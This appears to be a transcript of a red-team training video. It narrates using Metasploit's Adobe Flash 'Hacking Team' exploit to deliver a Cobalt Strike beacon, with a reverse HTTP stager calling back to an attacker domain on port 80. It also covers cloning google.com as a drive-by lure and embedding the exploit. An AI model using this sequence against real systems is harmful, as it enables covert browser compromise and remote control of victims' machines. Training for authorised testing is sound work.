Okay, let's take a look at how to deliver Cobalt Strike's beacon with a Metasploit framework client-side exploit. Let's say from the system profiler results, we determine that the target's environment is running an outdated version of Flash. And there happens to be a very reliable exploit in the Metasploit framework for that particular software. In these cases, it makes good sense to use Metasploit. So let me show you how to do that. Let's go pull open a console and let's run MSF console. Okay. Give that a second. Now let's go ahead and use an exploit. In this case, we're going to use the exploit multi-browser. We're going to use the Adobe Flash Hacking Team exploit. Okay. And we're going to point this particular exploit at our beacon listener in Amazon's Elastic Computing Cloud. And that's ads.losenolove.com, port 80. So let's go back here and let's do set payload, Windows Meterpreter, reverse HTTP. We're not really delivering Meterpreter here. We're just using Meterpreter's stager with this particular exploit. Let's set lhost to ads.losenolove.com. And let's set lport to port 80. Next, let's tell Metasploit not to create a payload handler for this attack because we have one already. And let's tell Metasploit to prepend the migrate shellcode to the stager. This forces the payload stager to migrate to another process before it downloads beacon and puts it into memory. This protects us in case the exploited application crashes or the user decides to close the browser. Very good. Now let's go ahead and type exploit-j, and we now have a Metasploit framework exploit server running that will deliver Cobalt Strike's beacon if all goes well. So we could send this to the target as is. I don't recommend you do that. I recommend you take a step and dress up the attack. One way to dress up the attack is to clone a website and embed this attack into it. Let's take a look at that process. Let's go to attacks, web drive-by, clone site. Okay, this is Cobalt Strike's site cloner tool. What we're going to do is we're going to clone a website. We'll clone, for example, google.com. And we'll bind that to /search and host this at ads.losenolove.com. Now, if we had any attacks running here, we could embed those into our cloned site. But instead, we're just going to paste in our Metasploit framework attack. Okay? And this will get embedded into the cloned site as an iframe. So let's go ahead and hit clone. And there we go. We now have a weaponized cloned site that embeds our Metasploit framework Flash exploit. Cool. So let's go to View, Weblog, where we can see the magic happen. Maybe even the beacon stager come in. We'll come over here to Metasploit so we can watch the activity here. And let's go ahead and hook a target. Okay, so let's go ahead and navigate to this malicious site from a vulnerable system. And that's not the one I want to use. It's this one. Okay, so what we're going to do is go to ads.losenolove.com /search. Okay. And hit enter. And now there's google.com. You can see in Metasploit there's some activity as it tries to exploit our browser. There you see a get on the beacon stager, and we now have a new beacon. So that's an example of using a memory corruption exploit from the Metasploit framework to deliver Cobalt Strike's beacon. And there's our exploited system right there.